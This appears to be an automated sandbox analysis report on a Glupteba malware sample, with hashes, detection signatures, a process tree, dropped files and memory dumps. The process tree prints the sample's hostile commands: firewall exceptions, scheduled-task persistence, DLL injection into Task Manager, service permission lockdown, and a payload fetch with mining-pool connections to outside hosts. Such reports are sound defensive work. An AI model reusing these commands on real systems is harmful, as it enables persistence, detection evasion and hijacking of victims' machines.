Analysis

  • max time kernel
    3s
  • max time network
    298s
  • platform
    windows10-1703_x64
  • resource
    win10-20240404-en
  • resource tags

    arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
  • submitted
    25-04-2024 22:28

General

  • Target

    e7c763314b52206d45e84b2707a4460d9e2c60c87fd2b930eef586bf421f6f45.exe

  • Size

    4.1MB

  • MD5

    38dfc87eeda13dd9f589bda016427b55

  • SHA1

    510dd660f82b867728b3cf7dbabcf51a1c4a2fc5

  • SHA256

    e7c763314b52206d45e84b2707a4460d9e2c60c87fd2b930eef586bf421f6f45

  • SHA512

    97dd6959765fb2e44d7020ed99a596bdc7e2ddf8076818342586998638b013aac43db1460f3759092a0aa3f4b69f88b056c4835b9b7b8a22762bfdaf2892a3b6

  • SSDEEP

    98304:ixMvDlpZvb8ZK6Pm1OqC68DUZP3t+NAeQDD60jtf0ZJUQwpesMAQ2H/nDo:iOpbkK6P76wCP3t+NMK0jtGJUQwpe8n0

Malware Config

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba payload 37 IoCs
  • Modifies Windows Firewall 2 TTPs 1 IoCs
  • UPX packed file 10 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Launches sc.exe 1 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • GoLang User-Agent 2 IoCs

    Uses default user-agent string defined by GoLang HTTP packages.

  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\e7c763314b52206d45e84b2707a4460d9e2c60c87fd2b930eef586bf421f6f45.exe
    "C:\Users\Admin\AppData\Local\Temp\e7c763314b52206d45e84b2707a4460d9e2c60c87fd2b930eef586bf421f6f45.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:5064
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -nologo -noprofile
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3916
    • C:\Users\Admin\AppData\Local\Temp\e7c763314b52206d45e84b2707a4460d9e2c60c87fd2b930eef586bf421f6f45.exe
      "C:\Users\Admin\AppData\Local\Temp\e7c763314b52206d45e84b2707a4460d9e2c60c87fd2b930eef586bf421f6f45.exe"
      2⤵
        PID:2236
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell -nologo -noprofile
          3⤵
            PID:1708
          • C:\Windows\System32\cmd.exe
            C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
            3⤵
              PID:2052
              • C:\Windows\system32\netsh.exe
                netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
                4⤵
                • Modifies Windows Firewall
                PID:2336
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -nologo -noprofile
              3⤵
                PID:4348
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                powershell -nologo -noprofile
                3⤵
                  PID:2664
                • C:\Windows\rss\csrss.exe
                  C:\Windows\rss\csrss.exe
                  3⤵
                    PID:3436
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      powershell -nologo -noprofile
                      4⤵
                        PID:3700
                      • C:\Windows\SYSTEM32\schtasks.exe
                        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                        4⤵
                        • Creates scheduled task(s)
                        PID:2336
                      • C:\Windows\SYSTEM32\schtasks.exe
                        schtasks /delete /tn ScheduledUpdate /f
                        4⤵
                          PID:2668
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          powershell -nologo -noprofile
                          4⤵
                            PID:4512
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            powershell -nologo -noprofile
                            4⤵
                              PID:5028
                            • C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
                              C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
                              4⤵
                                PID:1452
                              • C:\Windows\SYSTEM32\schtasks.exe
                                schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                                4⤵
                                • Creates scheduled task(s)
                                PID:512
                              • C:\Windows\windefender.exe
                                "C:\Windows\windefender.exe"
                                4⤵
                                  PID:1472
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                                    5⤵
                                      PID:648
                                      • C:\Windows\SysWOW64\sc.exe
                                        sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                                        6⤵
                                        • Launches sc.exe
                                        PID:976
                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    powershell -nologo -noprofile
                                    4⤵
                                      PID:1552
                                    • C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe
                                      C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe -xor=al2xoqueel0She4t -m=https://cdn.discordapp.com/attachments/1225871855328559147/1225878907014615161/kVYazCOZSwqudV?ex=6622bbb3&is=661046b3&hm=c80160577fcc82f0e337c537bdd214d60583ed75bb187a016d90f94471fc09b0& -pool tls://showlock.net:40001 -pool tls://showlock.net:443 -pool tcp://showlock.net:80
                                      4⤵
                                        PID:1448
                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        powershell -nologo -noprofile
                                        4⤵
                                          PID:4132
                                        • C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe
                                          C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe
                                          4⤵
                                            PID:4484
                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            powershell -nologo -noprofile
                                            4⤵
                                              PID:1864
                                            • C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe
                                              C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe
                                              4⤵
                                                PID:1896
                                        • C:\Windows\windefender.exe
                                          C:\Windows\windefender.exe
                                          1⤵
                                            PID:4468

                                          Network

                                          MITRE ATT&CK Enterprise v15

                                          Replay Monitor

                                          Loading Replay Monitor...

                                          Downloads

                                          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_stqlweqw.km0.ps1
                                            Filesize

                                            1B

                                            MD5

                                            c4ca4238a0b923820dcc509a6f75849b

                                            SHA1

                                            356a192b7913b04c54574d18c28d46e6395428ab

                                            SHA256

                                            6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

                                            SHA512

                                            4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

                                          • C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe
                                            Filesize

                                            2.0MB

                                            MD5

                                            1bf850b4d9587c1017a75a47680584c4

                                            SHA1

                                            75cd4738ffc07f203c3f3356bc946fdd0bcdbe19

                                            SHA256

                                            ac470c2fa05a67dd03cdc427e9957e661cd0ec7aecd9682ddb0b32c5cfc18955

                                            SHA512

                                            ed57be8c5a982bcbf901c2b035eb010e353508e7c7df338adc6e5c307e94427645e5f5ec28667fd861420b9411b4ade96ea6987519ed65e6c1d905b6eadfce08

                                          • C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe
                                            Filesize

                                            2.8MB

                                            MD5

                                            713674d5e968cbe2102394be0b2bae6f

                                            SHA1

                                            90ac9bd8e61b2815feb3599494883526665cb81e

                                            SHA256

                                            f724b2849e7dc38bf62114c11092020073bea509e2bc57dea7a94a2fc9c23057

                                            SHA512

                                            e9fba80067ac39d5907560abd044bb97dfcf078db2b6696ff4ca5990d9803a0c24b39d04e05682ac3dac8bc472e2ee0c573a46514e907f4d9673d4e7a76caafb

                                          • C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe
                                            Filesize

                                            2.0MB

                                            MD5

                                            dcb505dc2b9d8aac05f4ca0727f5eadb

                                            SHA1

                                            4f633edb62de05f3d7c241c8bc19c1e0be7ced75

                                            SHA256

                                            61f9194b9f33611ec902f02755cf2e86f0bbc84c2102c6e5d1874f9bae78e551

                                            SHA512

                                            31e1fce9aca3b5d9afc85640af04b4542b9897f7d60b699e3153516137d9358d3c101cacc04e9e594e36b8622e9489cecf0dda210662563565d80fb9a33549b3

                                          • C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
                                            Filesize

                                            281KB

                                            MD5

                                            d98e33b66343e7c96158444127a117f6

                                            SHA1

                                            bb716c5509a2bf345c6c1152f6e3e1452d39d50d

                                            SHA256

                                            5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1

                                            SHA512

                                            705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5

                                          • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
                                            Filesize

                                            2KB

                                            MD5

                                            e745b8b7681f5ae25b09a7b1eb2f8fd3

                                            SHA1

                                            cd55c3fcf95d11f5d4fb4a75233dc69494f74d80

                                            SHA256

                                            5a7e3072d483e8dc341b902b937b53a379dc4080f08b54410c3c2046dd500538

                                            SHA512

                                            65ff6cfa6b416c099612e9f00399514d52264a4a58f8c63e2f78111805bf623eecded3d18c36dc1be5431aef50a1c192eaed6122e10d722e94325e6412d4298e

                                          • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
                                            Filesize

                                            18KB

                                            MD5

                                            5f6a2a1ab2e26713125d4a8713d9d220

                                            SHA1

                                            f2afa700e618823156b18d2218a4f88f281cd48e

                                            SHA256

                                            ebc62ef334b3c32d844b6d10af073febdb59c333f4bd5b666bd80b0fb982876c

                                            SHA512

                                            eeafa32418e67b5d1b7a9faa75e0c5c2b9190af4231412b80a491397f74d4b71dc03280e62abe1897d62b35565b063b6793c1ed1e9ed455929bc3670dd0688da

                                          • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
                                            Filesize

                                            18KB

                                            MD5

                                            edc954dee90bec8c92105e82a61a341e

                                            SHA1

                                            75c79599c139b1a278f2f366651f60163eb762b1

                                            SHA256

                                            965368ab59a38ba508cf04a2b25d699bb81e0fa17677e67ad23b2f7bbe7eff9d

                                            SHA512

                                            37844239cfe0e6c7f72a69cf34410181d152b65abb361c054bf24b3c7e33d392ef4cea1a48f9fdec76a49920185b3e72fb373d23a7f50559a3c5cec6bc945926

                                          • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
                                            Filesize

                                            18KB

                                            MD5

                                            c620f5e22d339a0155b300481a80afc8

                                            SHA1

                                            b55a60d0f2074c66204c1dfceb786b2671452656

                                            SHA256

                                            99843a7b42e3287f82dfaa3bb000939a29edfc82674012b6fa7e0bddc94c6fb2

                                            SHA512

                                            9fbf2c4f37a5799d96752c8d426fd582eca0f9513e58193931c8ca8ff73c660b0fb6ac1a48f8734143d32c0b0e4e0d7228baec00027a49201ebf9563c79d3392

                                          • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
                                            Filesize

                                            18KB

                                            MD5

                                            1d64549cecf614da65bb8ab488e72a36

                                            SHA1

                                            ec3f14cb8018d18b33a3f8a362c99aa048b86598

                                            SHA256

                                            1f09a0e3763981ffc507c27ac4e4da02115c746ae2f9e1569f680d5150619044

                                            SHA512

                                            85e4dee69676124690e126b9a24dcf802a0462800cf3aeae8f5a288ca536078f582b9adf156bef30ef97d0fd052c004cc3d71f963e6b2a1586105245606299c7

                                          • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
                                            Filesize

                                            18KB

                                            MD5

                                            a97a3caa866c994c60527afc41c82e96

                                            SHA1

                                            15e0d3278007ddf5dfd1b9d629c5c40c48978d2a

                                            SHA256

                                            2221ec4c1a65c68f2f10fbc8245b9c22e875a06982b4043df69f76789b0f6376

                                            SHA512

                                            f655ef826110368df5d16d5deca7dba1a7c0a9f9fb2d9aaf6cce7f05ceeb267babe358a503744f8e651203a55058e7a237410f47abb652cb3d5f0d1bf6db45a0

                                          • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
                                            Filesize

                                            18KB

                                            MD5

                                            3c1156e5324b38702c92f207e9a1e7fd

                                            SHA1

                                            34f2bdc67e4d12ae56a60e428097fe79e7dda1b0

                                            SHA256

                                            8d305385e7d2c4678c0f3cfb30d38cf405a62f0403af8a3e0a0aaec691a702a9

                                            SHA512

                                            d37d0142ddf5311e873b7138098b32a6a2c93b8eefee17822e57dd28aaa21fe43f51e2acb026fb0cf143a2742e537414993f2a4c96193e830c08a7b1637ea5db

                                          • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
                                            Filesize

                                            18KB

                                            MD5

                                            e40088146203b55a9729c487da721de7

                                            SHA1

                                            49f99ff855ab47b55ee56da8221a5dbd925d4293

                                            SHA256

                                            e1d43491b61f39907b7d4ed001fdfeee154c10e68f8d8611a3ae8442e63f4a31

                                            SHA512

                                            405ba5d5a6407b944035646e150fe93e61d2b9b946d405354999a9dd378415192ae5b8b157f48b6b091c0fcd703eccd5cdb99d35a5632ffdb4cf92b447a2598f

                                          • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
                                            Filesize

                                            18KB

                                            MD5

                                            932d5167fde051b6db02d46b6c8b3037

                                            SHA1

                                            07b0bbfa0febc2e93dafcc55bf6409d82153a63f

                                            SHA256

                                            85c5a3d92e1dd7f5d230ad837f60794addb93915de1edad0c9dcd374bd545253

                                            SHA512

                                            15160b1a05cd8ad6dd31fce01ef151e7257b16d85c2526fa94c43a5a249046270c4b9f8d4d88f4ecb3e0b0af8306233578bc2f4128bcec4c4768092298247ab9

                                          • C:\Windows\rss\csrss.exe
                                            Filesize

                                            4.1MB

                                            MD5

                                            38dfc87eeda13dd9f589bda016427b55

                                            SHA1

                                            510dd660f82b867728b3cf7dbabcf51a1c4a2fc5

                                            SHA256

                                            e7c763314b52206d45e84b2707a4460d9e2c60c87fd2b930eef586bf421f6f45

                                            SHA512

                                            97dd6959765fb2e44d7020ed99a596bdc7e2ddf8076818342586998638b013aac43db1460f3759092a0aa3f4b69f88b056c4835b9b7b8a22762bfdaf2892a3b6

                                          • C:\Windows\windefender.exe
                                            Filesize

                                            2.0MB

                                            MD5

                                            8e67f58837092385dcf01e8a2b4f5783

                                            SHA1

                                            012c49cfd8c5d06795a6f67ea2baf2a082cf8625

                                            SHA256

                                            166ddb03ff3c89bd4525ac390067e180fdd08f10fbcf4aadb0189541673c03fa

                                            SHA512

                                            40d8ae12663fc1851e171d9d86cea8bb12487b734c218d7b6f9742eb07d4ca265065cbd6d0bb908f8bda7e3d955c458dfe3fd13265bbf573b9351e0a2bf691ec

                                          • memory/1448-2096-0x0000000000400000-0x00000000008E1000-memory.dmp
                                            Filesize

                                            4.9MB

                                          • memory/1472-1790-0x0000000000400000-0x00000000008DF000-memory.dmp
                                            Filesize

                                            4.9MB

                                          • memory/1708-331-0x0000000070620000-0x000000007066B000-memory.dmp
                                            Filesize

                                            300KB

                                          • memory/1708-311-0x0000000008750000-0x000000000879B000-memory.dmp
                                            Filesize

                                            300KB

                                          • memory/1708-310-0x00000000739F0000-0x00000000740DE000-memory.dmp
                                            Filesize

                                            6.9MB

                                          • memory/1708-309-0x0000000007200000-0x0000000007210000-memory.dmp
                                            Filesize

                                            64KB

                                          • memory/1708-549-0x00000000739F0000-0x00000000740DE000-memory.dmp
                                            Filesize

                                            6.9MB

                                          • memory/1708-339-0x0000000007200000-0x0000000007210000-memory.dmp
                                            Filesize

                                            64KB

                                          • memory/1708-338-0x0000000009B60000-0x0000000009C05000-memory.dmp
                                            Filesize

                                            660KB

                                          • memory/1708-334-0x000000007EF40000-0x000000007EF50000-memory.dmp
                                            Filesize

                                            64KB

                                          • memory/1708-307-0x0000000008030000-0x0000000008380000-memory.dmp
                                            Filesize

                                            3.3MB

                                          • memory/1708-332-0x0000000070790000-0x0000000070AE0000-memory.dmp
                                            Filesize

                                            3.3MB

                                          • memory/1708-308-0x0000000007200000-0x0000000007210000-memory.dmp
                                            Filesize

                                            64KB

                                          • memory/1896-2587-0x0000000000400000-0x00000000008E8000-memory.dmp
                                            Filesize

                                            4.9MB

                                          • memory/2236-799-0x0000000000400000-0x0000000003005000-memory.dmp
                                            Filesize

                                            44.0MB

                                          • memory/2236-306-0x0000000000400000-0x0000000003005000-memory.dmp
                                            Filesize

                                            44.0MB

                                          • memory/2236-303-0x0000000003590000-0x000000000398C000-memory.dmp
                                            Filesize

                                            4.0MB

                                          • memory/2236-330-0x0000000000400000-0x0000000003005000-memory.dmp
                                            Filesize

                                            44.0MB

                                          • memory/2236-583-0x0000000003590000-0x000000000398C000-memory.dmp
                                            Filesize

                                            4.0MB

                                          • memory/2236-1037-0x0000000000400000-0x0000000003005000-memory.dmp
                                            Filesize

                                            44.0MB

                                          • memory/2664-819-0x0000000070770000-0x0000000070AC0000-memory.dmp
                                            Filesize

                                            3.3MB

                                          • memory/2664-796-0x0000000005120000-0x0000000005130000-memory.dmp
                                            Filesize

                                            64KB

                                          • memory/2664-1033-0x00000000739F0000-0x00000000740DE000-memory.dmp
                                            Filesize

                                            6.9MB

                                          • memory/2664-824-0x0000000005120000-0x0000000005130000-memory.dmp
                                            Filesize

                                            64KB

                                          • memory/2664-818-0x0000000070720000-0x000000007076B000-memory.dmp
                                            Filesize

                                            300KB

                                          • memory/2664-797-0x0000000005120000-0x0000000005130000-memory.dmp
                                            Filesize

                                            64KB

                                          • memory/2664-795-0x00000000739F0000-0x00000000740DE000-memory.dmp
                                            Filesize

                                            6.9MB

                                          • memory/3436-1808-0x0000000000400000-0x0000000003005000-memory.dmp
                                            Filesize

                                            44.0MB

                                          • memory/3436-2583-0x0000000000400000-0x0000000003005000-memory.dmp
                                            Filesize

                                            44.0MB

                                          • memory/3436-1826-0x0000000000400000-0x0000000003005000-memory.dmp
                                            Filesize

                                            44.0MB

                                          • memory/3436-1824-0x0000000000400000-0x0000000003005000-memory.dmp
                                            Filesize

                                            44.0MB

                                          • memory/3436-1822-0x0000000000400000-0x0000000003005000-memory.dmp
                                            Filesize

                                            44.0MB

                                          • memory/3436-1820-0x0000000000400000-0x0000000003005000-memory.dmp
                                            Filesize

                                            44.0MB

                                          • memory/3436-1818-0x0000000000400000-0x0000000003005000-memory.dmp
                                            Filesize

                                            44.0MB

                                          • memory/3436-1816-0x0000000000400000-0x0000000003005000-memory.dmp
                                            Filesize

                                            44.0MB

                                          • memory/3436-1814-0x0000000000400000-0x0000000003005000-memory.dmp
                                            Filesize

                                            44.0MB

                                          • memory/3436-1830-0x0000000000400000-0x0000000003005000-memory.dmp
                                            Filesize

                                            44.0MB

                                          • memory/3436-1832-0x0000000000400000-0x0000000003005000-memory.dmp
                                            Filesize

                                            44.0MB

                                          • memory/3436-1834-0x0000000000400000-0x0000000003005000-memory.dmp
                                            Filesize

                                            44.0MB

                                          • memory/3436-1812-0x0000000000400000-0x0000000003005000-memory.dmp
                                            Filesize

                                            44.0MB

                                          • memory/3436-1810-0x0000000000400000-0x0000000003005000-memory.dmp
                                            Filesize

                                            44.0MB

                                          • memory/3436-1792-0x0000000000400000-0x0000000003005000-memory.dmp
                                            Filesize

                                            44.0MB

                                          • memory/3436-1806-0x0000000000400000-0x0000000003005000-memory.dmp
                                            Filesize

                                            44.0MB

                                          • memory/3436-1836-0x0000000000400000-0x0000000003005000-memory.dmp
                                            Filesize

                                            44.0MB

                                          • memory/3436-1828-0x0000000000400000-0x0000000003005000-memory.dmp
                                            Filesize

                                            44.0MB

                                          • memory/3436-2586-0x0000000000400000-0x0000000003005000-memory.dmp
                                            Filesize

                                            44.0MB

                                          • memory/3436-1804-0x0000000000400000-0x0000000003005000-memory.dmp
                                            Filesize

                                            44.0MB

                                          • memory/3436-1802-0x0000000000400000-0x0000000003005000-memory.dmp
                                            Filesize

                                            44.0MB

                                          • memory/3436-1040-0x0000000003A00000-0x0000000003DF9000-memory.dmp
                                            Filesize

                                            4.0MB

                                          • memory/3436-1041-0x00000000055A0000-0x0000000005E8B000-memory.dmp
                                            Filesize

                                            8.9MB

                                          • memory/3436-1044-0x0000000000400000-0x0000000003005000-memory.dmp
                                            Filesize

                                            44.0MB

                                          • memory/3436-1783-0x0000000000400000-0x0000000003005000-memory.dmp
                                            Filesize

                                            44.0MB

                                          • memory/3436-1800-0x0000000000400000-0x0000000003005000-memory.dmp
                                            Filesize

                                            44.0MB

                                          • memory/3436-1794-0x0000000000400000-0x0000000003005000-memory.dmp
                                            Filesize

                                            44.0MB

                                          • memory/3436-1796-0x0000000000400000-0x0000000003005000-memory.dmp
                                            Filesize

                                            44.0MB

                                          • memory/3436-1798-0x0000000000400000-0x0000000003005000-memory.dmp
                                            Filesize

                                            44.0MB

                                          • memory/3436-1069-0x0000000000400000-0x0000000003005000-memory.dmp
                                            Filesize

                                            44.0MB

                                          • memory/3700-1050-0x0000000008220000-0x000000000826B000-memory.dmp
                                            Filesize

                                            300KB

                                          • memory/3700-1045-0x0000000007930000-0x0000000007C80000-memory.dmp
                                            Filesize

                                            3.3MB

                                          • memory/3700-1047-0x0000000000FE0000-0x0000000000FF0000-memory.dmp
                                            Filesize

                                            64KB

                                          • memory/3700-1049-0x0000000073950000-0x000000007403E000-memory.dmp
                                            Filesize

                                            6.9MB

                                          • memory/3700-1046-0x0000000000FE0000-0x0000000000FF0000-memory.dmp
                                            Filesize

                                            64KB

                                          • memory/3916-76-0x0000000009880000-0x000000000989E000-memory.dmp
                                            Filesize

                                            120KB

                                          • memory/3916-10-0x0000000006B70000-0x0000000006B92000-memory.dmp
                                            Filesize

                                            136KB

                                          • memory/3916-13-0x0000000007590000-0x00000000078E0000-memory.dmp
                                            Filesize

                                            3.3MB

                                          • memory/3916-299-0x00000000738F0000-0x0000000073FDE000-memory.dmp
                                            Filesize

                                            6.9MB

                                          • memory/3916-14-0x0000000007900000-0x000000000791C000-memory.dmp
                                            Filesize

                                            112KB

                                          • memory/3916-15-0x0000000007EB0000-0x0000000007EFB000-memory.dmp
                                            Filesize

                                            300KB

                                          • memory/3916-6-0x0000000000CA0000-0x0000000000CD6000-memory.dmp
                                            Filesize

                                            216KB

                                          • memory/3916-34-0x00000000089D0000-0x0000000008A0C000-memory.dmp
                                            Filesize

                                            240KB

                                          • memory/3916-65-0x0000000008A90000-0x0000000008B06000-memory.dmp
                                            Filesize

                                            472KB

                                          • memory/3916-75-0x0000000070650000-0x00000000709A0000-memory.dmp
                                            Filesize

                                            3.3MB

                                          • memory/3916-81-0x00000000098E0000-0x0000000009985000-memory.dmp
                                            Filesize

                                            660KB

                                          • memory/3916-7-0x00000000738F0000-0x0000000073FDE000-memory.dmp
                                            Filesize

                                            6.9MB

                                          • memory/3916-8-0x0000000000E00000-0x0000000000E10000-memory.dmp
                                            Filesize

                                            64KB

                                          • memory/3916-9-0x0000000006F60000-0x0000000007588000-memory.dmp
                                            Filesize

                                            6.2MB

                                          • memory/3916-74-0x0000000070600000-0x000000007064B000-memory.dmp
                                            Filesize

                                            300KB

                                          • memory/3916-73-0x00000000098A0000-0x00000000098D3000-memory.dmp
                                            Filesize

                                            204KB

                                          • memory/3916-11-0x0000000006C10000-0x0000000006C76000-memory.dmp
                                            Filesize

                                            408KB

                                          • memory/3916-12-0x0000000006D80000-0x0000000006DE6000-memory.dmp
                                            Filesize

                                            408KB

                                          • memory/3916-281-0x0000000009A50000-0x0000000009A58000-memory.dmp
                                            Filesize

                                            32KB

                                          • memory/3916-276-0x0000000009A60000-0x0000000009A7A000-memory.dmp
                                            Filesize

                                            104KB

                                          • memory/3916-72-0x000000007EAA0000-0x000000007EAB0000-memory.dmp
                                            Filesize

                                            64KB

                                          • memory/3916-83-0x0000000009AE0000-0x0000000009B74000-memory.dmp
                                            Filesize

                                            592KB

                                          • memory/3916-82-0x0000000000E00000-0x0000000000E10000-memory.dmp
                                            Filesize

                                            64KB

                                          • memory/4348-792-0x00000000739F0000-0x00000000740DE000-memory.dmp
                                            Filesize

                                            6.9MB

                                          • memory/4348-556-0x0000000007C10000-0x0000000007F60000-memory.dmp
                                            Filesize

                                            3.3MB

                                          • memory/4348-558-0x00000000081B0000-0x00000000081FB000-memory.dmp
                                            Filesize

                                            300KB

                                          • memory/4348-578-0x0000000070770000-0x0000000070AC0000-memory.dmp
                                            Filesize

                                            3.3MB

                                          • memory/4348-577-0x0000000070720000-0x000000007076B000-memory.dmp
                                            Filesize

                                            300KB

                                          • memory/4348-554-0x00000000739F0000-0x00000000740DE000-memory.dmp
                                            Filesize

                                            6.9MB

                                          • memory/4348-555-0x0000000006DD0000-0x0000000006DE0000-memory.dmp
                                            Filesize

                                            64KB

                                          • memory/4468-1793-0x0000000000400000-0x00000000008DF000-memory.dmp
                                            Filesize

                                            4.9MB

                                          • memory/4468-1797-0x0000000000400000-0x00000000008DF000-memory.dmp
                                            Filesize

                                            4.9MB

                                          • memory/4484-2585-0x0000000000160000-0x0000000000A2D000-memory.dmp
                                            Filesize

                                            8.8MB

                                          • memory/5064-1-0x00000000035C0000-0x00000000039C1000-memory.dmp
                                            Filesize

                                            4.0MB

                                          • memory/5064-3-0x0000000000400000-0x0000000003005000-memory.dmp
                                            Filesize

                                            44.0MB

                                          • memory/5064-302-0x0000000005170000-0x0000000005A5B000-memory.dmp
                                            Filesize

                                            8.9MB

                                          • memory/5064-300-0x0000000000400000-0x0000000003005000-memory.dmp
                                            Filesize

                                            44.0MB

                                          • memory/5064-2-0x0000000005170000-0x0000000005A5B000-memory.dmp
                                            Filesize

                                            8.9MB